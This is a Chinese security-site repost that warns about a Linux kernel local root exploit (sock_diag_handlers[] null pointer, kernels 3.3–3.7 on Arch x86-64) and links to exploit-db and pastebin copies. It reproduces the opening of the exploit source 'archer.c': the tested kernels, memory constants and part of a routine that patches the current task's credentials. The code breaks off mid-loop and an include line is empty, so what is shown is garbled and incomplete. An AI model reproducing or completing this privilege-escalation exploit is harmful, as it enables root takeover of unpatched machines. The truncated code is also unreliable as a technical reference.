Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

admin
admin
admin
139164
文章
114
评论
2021年4月3日19:23:22评论53 views字数 1070阅读3分34秒阅读模式

最近国外爆出的又一个linux local root,又是一个Null指针问题,利用起来也相当easy,各位看exp代码就可以有类似感受了。

http://www.exploit-db.com/exploits/24555/

http://pastebin.com/w0eDGAyq

http://pastebin.com/L0PiRwmY

这里预警一下。各位对此有什么想说的么?   

// archer.c
//
// 2012 [email protected]
//
// Works reliably against x86-64 3.3-3.7 arch.
//
// Tested against:
//
// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
// ...

#include 

#define JUMP  0x0000100000001000LL
#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000

static long ugid;

void patch_current() {
        int i,j,k;
        char *current = *(char**)(((long)&i) & (-8192));
        long kbase = ((long)current)>>36;

        for (i=0; i>36) != kbase)) continue;
                for (j=0; j


	摘自: 




	http://www.exploit-db.com/exploits/24555/ 




	http://zone.wooyun.org/content/2779

文章来源于lcx.cc:Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

相关推荐: 双系统的UEFI引导方案及失败后的修复方法

接上文:教程:如何无损从MBR引导更改为UEFI 本教程需要用到前篇文章中的工具,如果没有请到上文下载。这里不另外发了。 双系统UEFI引导设置: 请先下载bcdtice,这个工具上文没有,在这里发出:BOOTICEx86.zip(三方工具,病毒自测,谨慎使用…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:23:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Roothttps://cn-sec.com/archives/322108.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息